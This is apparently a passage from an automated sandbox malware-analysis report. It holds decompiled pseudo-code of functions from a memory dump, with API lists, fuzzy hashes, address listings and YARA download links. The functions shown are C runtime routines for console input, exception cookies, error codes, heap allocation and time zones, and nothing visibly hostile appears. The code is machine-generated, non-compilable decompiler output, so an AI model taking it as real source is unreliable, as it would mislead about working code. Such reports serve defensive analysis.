									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E6D4B41F9())) = 0xc;
									 *(E6D4B41E6()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E6D4C02CE(_t246);
									return _t242;
								}
							}
							L15:
							 *(E6D4B41E6()) =  *_t206 & _t246;
							 *((intOrPtr*)(E6D4B41F9())) = 0x16;
							E6D4B40C8();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E6D4B41E6()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E6D4B41F9())) = 0x16;
					goto L59;
				} else {
					 *(E6D4B41E6()) =  *_t212 & 0x00000000;
					_t145 = E6D4B41F9();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90bb9863fc198cc7d9ac069fb6b090f3c3fd829e181989385c23b3e5aa1dfd43
Instruction ID: fab856745e61aafe028194d5cca3168a18b08f21658e83dac7dbe6dc952cc962
Opcode Fuzzy Hash: 90bb9863fc198cc7d9ac069fb6b090f3c3fd829e181989385c23b3e5aa1dfd43
Instruction Fuzzy Hash: 35C17F78D0838A9BDF01DFA9C844FBD7BB4AF1A314F254149E914A7381C7349D41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D494EA0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D494EA0(void* __ebx, void* __edi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				void* __esi;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				intOrPtr _t76;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t97;
				long _t99;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;
				void* _t113;

				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t95 = _t74 + 0x10;
				_push(_t95);
				_v16 = 1;
				_v20 = _t95;
				_v12 =  *(_t74 + 8) ^  *0x6d534074;
				E6D494E60(__edi,  *(_t74 + 8) ^  *0x6d534074);
				E6D496197(_a12);
				_t51 = _a4;
				_t107 = _t106 + 0xc;
				_t92 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t92 - 0xfffffffe;
					if(_t92 != 0xfffffffe) {
						E6D496850(_t74, 0xfffffffe, _t95, 0x6d534074);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t92 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t92 + 2; // 0x3
							_t58 = _t92 + _t20 * 2;
							_t76 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t60 = E6D496800(_t79, _t95);
								_t80 = 1;
								_v5 = 1;
								_t113 = _t60;
								if(_t113 < 0) {
									_v16 = 0;
									L14:
									_push(_t95);
									E6D494E60(_t92, _v12);
									goto L15;
								} else {
									if(_t113 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6d50472c;
											if(__eflags != 0) {
												_t70 = E6D4D5F00(__eflags, "J,Im");
												_t107 = _t107 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t99 =  *0x6d50472c; // 0x6d492c4a
													 *0x6d5001e8(_a4, 1);
													 *_t99();
													_t95 = _v20;
													_t107 = _t107 + 8;
												}
												_t61 = _a4;
											}
										}
										E6D496834(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t92;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t92) {
											E6D496850(_t63, _t92, _t95, 0x6d534074);
											_t63 = _a8;
										}
										_push(_t95);
										 *((intOrPtr*)(_t63 + 0xc)) = _t76;
										E6D494E60(_t92, _v16);
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6D496818();
										asm("int3");
										_t102 = _t100;
										_t104 = _t102;
										_push(_t104);
										_push(_t95);
										_t97 = _v40;
										__eflags = _t97 - 0xffffffe0;
										if(_t97 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6D4B41F9())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t97;
											if(_t97 == 0) {
												_t97 = _t97 + 1;
											}
											while(1) {
												_t66 = HeapAlloc( *0x6d540b4c, 0, _t97);
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6D4CE068();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6D4BA958(_t83, _t97, __eflags, _t97);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t92 = _t76;
						} while (_t76 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}

APIs

_ValidateLocalCookies.LIBCMT ref: 6D494ECB
___except_validate_context_record.LIBVCRUNTIME ref: 6D494ED3
_ValidateLocalCookies.LIBCMT ref: 6D494F61
__IsNonwritableInCurrentImage.LIBCMT ref: 6D494F8C
_ValidateLocalCookies.LIBCMT ref: 6D494FE1

Strings

csm, xrefs: 6D494F76
J,Im, xrefs: 6D494F7E, 6D494F87, 6D494F98

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: J,Im$csm
API String ID: 1170836740-2235640974
Opcode ID: 559814ae7577b14643d2c7aac726f99b01c80c73f3e99144b1ce7183a6a86c84
Instruction ID: 56d42ca07e9bd94896a8f8fd8a3f6961398c62a3a155eb5f8c1f496e43b8979a
Opcode Fuzzy Hash: 559814ae7577b14643d2c7aac726f99b01c80c73f3e99144b1ce7183a6a86c84
Instruction Fuzzy Hash: 2E41A234A1420A9BCF00CF6AC844EAEBFB5AF4A358F118159E9289F349D731DE05CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BDE57, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6D4BDE57(void* __ebx, void* __ecx, void* __edx, void* __fp0) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t10;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;
				void* _t48;

				_t48 = __fp0;
				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6d5341e0; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6D4BF58C(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6D4C48FD(_t25, _t36, __eflags,  *0x6d5341e0, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6D4BDB97(_t25, _t31, 0x6d540730);
							E6D4C02CE(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6D4C02CE();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6D4B5C1C(_t20, _t29, _t31, _t36, _t48);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6d5341e0; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t10 = E6D4BF58C(_t25, 1, 0x364); // executed
							_t32 = _t10;
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6D4C48FD(_t27, _t37, __eflags,  *0x6d5341e0, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6D4BDB97(_t27, _t32, 0x6d540730);
									E6D4C02CE(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6D4C02CE();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6D4C48A7(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6D4C48A7(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x6d4bde57
0x6d4bde57
0x6d4bde57
0x6d4bde57
0x6d4bde61
0x6d4bde63
0x6d4bde68
0x6d4bde6b
0x6d4bde79
0x6d4bde80
0x6d4bde85
0x6d4bde88
0x6d4bde8b
0x6d4bde9d
0x6d4bdea2
0x6d4bdea4
0x6d4bdeaf
0x6d4bdeb6
0x6d4bdebb
0x6d4bdebe
0x6d4bdec0
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4bdea6
0x6d4bdea6
0x00000000
0x6d4bdea6
0x6d4bde8d
0x6d4bde8d
0x6d4bde8e
0x6d4bde8e
0x6d4bde93
0x6d4bdece
0x6d4bdecf
0x6d4bded5
0x6d4bdeda
0x6d4bdedd
0x6d4bdede
0x6d4bdedf
0x6d4bdee6
0x6d4bdee8
0x6d4bdeea
0x6d4bdeef
0x6d4bdef2
0x6d4bdf00
0x6d4bdf07
0x6d4bdf0c
0x6d4bdf0f
0x6d4bdf12
0x6d4bdf24
0x6d4bdf29
0x6d4bdf2b
0x6d4bdf36
0x6d4bdf3c
0x6d4bdf44
0x6d4bdf46
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4bdf2d
0x6d4bdf2d
0x00000000
0x6d4bdf2d
0x6d4bdf14
0x6d4bdf14
0x6d4bdf15
0x6d4bdf15
0x6d4bdf48
0x6d4bdf49
0x6d4bdf49
0x6d4bdef4
0x6d4bdefa
0x6d4bdefe
0x6d4bdf51
0x6d4bdf52
0x6d4bdf58
0x00000000
0x00000000
0x00000000
0x6d4bdefe
0x6d4bdf5f
0x6d4bdf5f
0x6d4bde6d
0x6d4bde73
0x6d4bde77
0x6d4bdec2
0x6d4bdec3
0x6d4bdecd
0x00000000
0x00000000
0x00000000
0x6d4bde77

APIs

GetLastError.KERNEL32(?,ios_base::failbit set,6D4B3983,6D532068,0000000C,6D4FBC90,00000001,6D4FBC90,00000000,?,6D456A94,286E79BA), ref: 6D4BDE5B
_free.LIBCMT ref: 6D4BDE8E
_free.LIBCMT ref: 6D4BDEB6
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,00000000,?,6D456A94,286E79BA), ref: 6D4BDEC3
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,00000000,?,6D456A94,286E79BA), ref: 6D4BDECF
_abort.LIBCMT ref: 6D4BDED5

Strings

ios_base::failbit set, xrefs: 6D4BDE59

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID: ios_base::failbit set
API String ID: 3160817290-3924258884
Opcode ID: e1390838b764a5236f3fc8d54c623925e1e83075214bcca5f555afb06658cb94
Instruction ID: 5379e335cb7943bf93024828e80a1b306c7192e2a0354b798b4b247f66b3b47a
Opcode Fuzzy Hash: e1390838b764a5236f3fc8d54c623925e1e83075214bcca5f555afb06658cb94
Instruction Fuzzy Hash: 0BF0F43D508E0126DB0256399D08F2B26769FF67AAF37415DF61A92680EF398C0280B2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C8870, Relevance: 10.9, APIs: 7, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6D4C8870(void* __ebx, void* __edi, signed int __esi, void* __eflags, void* __fp0, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;
				void* _t221;

				_t221 = __fp0;
				_t178 = __esi;
				_t171 = __edi;
				_t65 = E6D4C831F();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6D4C837D( &_v8) != 0 || E6D4C8325( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6D4B40F5();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6D4C831F();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6D4C837D( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6D4B40F5();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6d534074; // 0x286e79ba
						_v100 = _t74 ^ _t192;
						 *0x6d534494 =  *0x6d534494 | 0xffffffff;
						 *0x6d534488 =  *0x6d534488 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6d540a58 = 0;
						_t78 = E6D4D2636(0x6d508120, 0, _t179, __eflags, _t221,  &_v360,  &_v356, 0x100, 0x6d508120);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6D4C1817(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6D4D2636(0x6d508120, 0, _t184, __eflags, _t221,  &_v280, _t184, _v276, 0x6d508120);
									__eflags = _t85;
									if(_t85 == 0) {
										E6D4C02CE(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6D4C02CE();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6D4C8870(0x6d508120, _t172, _t183, __eflags, _t221);
							}
						}
						E6D4C02CE(_t183);
						__eflags = _v16 ^ _t192;
						return E6D4903E3(_v16 ^ _t192);
					} else {
						_t89 = E6D4C8325( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6D4C8351( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6D4C02CE( *0x6d540a50);
								 *0x6d540a50 = 0;
								 *_t194 = 0x6d540a60;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6d540a60 * 0x3c;
									_t167 =  *0x6d540ab4; // 0x0
									_push(_t171);
									 *0x6d540a58 = 1;
									_v12 = _t150;
									__eflags =  *0x6d540aa6; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6d540afa; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6d540b08; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E6D4B4298(0, _t167, _t221);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6d540a64, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6d540ab8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6D4C8319()) = _v12;
								 *((intOrPtr*)(E6D4C830D())) = _v16;
								_t96 = E6D4C8313();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x6d540a50; // 0x0
					_t178 = _a4;
					if(_t168 == 0) {
						L12:
						E6D4C02CE(_t168);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6d4c8c61
						_t169 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t169 + 1; // 0x6d4c8c62
						 *0x6d540a50 = E6D4C1817(_t154 - _t169, _t13);
						_t116 = E6D4C02CE(0);
						_t170 =  *0x6d540a50; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6d4c8c61
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6d4c8c62
							_t119 = E6D4BC262(_t170, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6D4D19CF(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6D4BD6B5(_t159, _t221, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6D4BD6B5(_t161, _t221, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6D4BD6B5(_t161, _t221, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6D4C8319()) = _v8;
										_t128 = E6D4C830D();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6D4D19CF(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}

APIs

_free.LIBCMT ref: 6D4C88F2
_free.LIBCMT ref: 6D4C8916
_free.LIBCMT ref: 6D4C8A9D
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D508120), ref: 6D4C8AAF
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540A64,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4C8B27
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540AB8,000000FF,?,0000003F,00000000,?), ref: 6D4C8B54
_free.LIBCMT ref: 6D4C8C69

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 5ca78d346321577270b4840a01a8cea440fef9e44318a53c93c801b999f24471
Instruction ID: 919b703ca97fa5f29b14318156a3eb085a2b0109bd7dabcb1f97c2eb38637080
Opcode Fuzzy Hash: 5ca78d346321577270b4840a01a8cea440fef9e44318a53c93c801b999f24471
Instruction Fuzzy Hash: E6C128799082069FDB15DF79C840FAE7BB8AF42314F2541AEE59497341E7318E41CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6D45D4D0, Relevance: 10.7, APIs: 7, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6D45D4D0(void* __edx, void* __fp0) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				char _v32;
				char _v36;
				void* _v40;
				char _v44;
				char _v60;
				char _v108;
				char _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t54;
				intOrPtr _t61;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t76;
				void* _t78;
				signed int _t83;
				signed int _t84;
				void* _t85;
				intOrPtr _t88;
				intOrPtr _t92;
				void* _t98;
				signed int _t100;
				intOrPtr* _t104;
				void* _t110;
				void* _t122;
				void* _t130;

				_t130 = __fp0;
				_t98 = __edx;
				_t85 = _t110;
				_v8 =  *((intOrPtr*)(_t85 + 4));
				_push(0xffffffff);
				_push(0x6d4fc1bb);
				_push( *[fs:0x0]);
				_push(_t85);
				_t54 =  *0x6d534074; // 0x286e79ba
				_push(_t54 ^ (_t110 - 0x00000008 & 0xfffffff8) + 0x00000004);
				 *[fs:0x0] =  &_v24;
				_v32 = 0;
				E6D476A10( &_v44, 0);
				_v16 = 0;
				_t100 =  *0x6d53fb54; // 0x2
				_v40 =  *0x6d55a9e8;
				if(_t100 == 0) {
					E6D476A10( &_v36, _t100);
					_v16 = 1;
					_t122 =  *0x6d53fb54 - _t100; // 0x2
					if(_t122 == 0) {
						_t83 =  *0x6d53fb40; // 0x2
						_t84 = _t83 + 1;
						 *0x6d53fb40 = _t84;
						 *0x6d53fb54 = _t84;
					}
					_v16 = 0;
					E6D476A77( &_v36);
					_t100 =  *0x6d53fb54; // 0x2
				}
				_t88 =  *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)) + 4));
				if(_t100 >=  *((intOrPtr*)(_t88 + 0xc))) {
					_t104 = 0;
					__eflags = 0;
					L8:
					if( *((char*)(_t88 + 0x14)) == 0) {
						L11:
						if(_t104 != 0) {
							L21:
							_v16 = 0xffffffff;
							E6D476A77( &_v44);
							 *[fs:0x0] = _v24;
							return _t104;
						}
						L12:
						_t61 = _v40;
						if(_t61 == 0) {
							_push(0x44);
							_t104 = E6D4906EF(_t88, _t98, _t104, __eflags);
							_v40 = _t104;
							_v16 = 2;
							_t92 =  *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)) + 4));
							__eflags = _t92;
							if(_t92 != 0) {
								_t64 =  *((intOrPtr*)(_t92 + 0x18));
								__eflags = _t64;
								if(_t64 == 0) {
									_t64 = _t92 + 0x1c;
								}
							} else {
								_t64 = 0x6d50f4bd;
							}
							L6D4519A0(_t85,  &_v160, _t98, _t100, _t130, _t64);
							_v16 = 3;
							_v32 = 1;
							 *_t104 = 0x6d500310;
							_v16 = 4;
							_t34 = _t104 + 4; // 0x4
							 *_t104 = 0x6d500320;
							 *_t34 = 0;
							_v16 = 5;
							 *_t104 = 0x6d50034c;
							_v16 = 6;
							 *_t104 = 0x6d500a80;
							E6D47A48E( &_v160, _t34, __eflags,  &_v60);
							asm("movups xmm0, [eax]");
							asm("movups [esi+0x8], xmm0");
							_t69 = E6D47A6A8(__eflags,  &_v108);
							asm("movups xmm0, [eax]");
							asm("movups [esi+0x18], xmm0");
							asm("movups xmm0, [eax+0x10]");
							asm("movups [esi+0x28], xmm0");
							asm("movq xmm0, [eax+0x20]");
							asm("movq [esi+0x38], xmm0");
							 *((intOrPtr*)(_t104 + 0x40)) =  *((intOrPtr*)(_t69 + 0x28));
							_v16 = 0;
							_v32 = 1;
							_v32 = 0;
							E6D451A70();
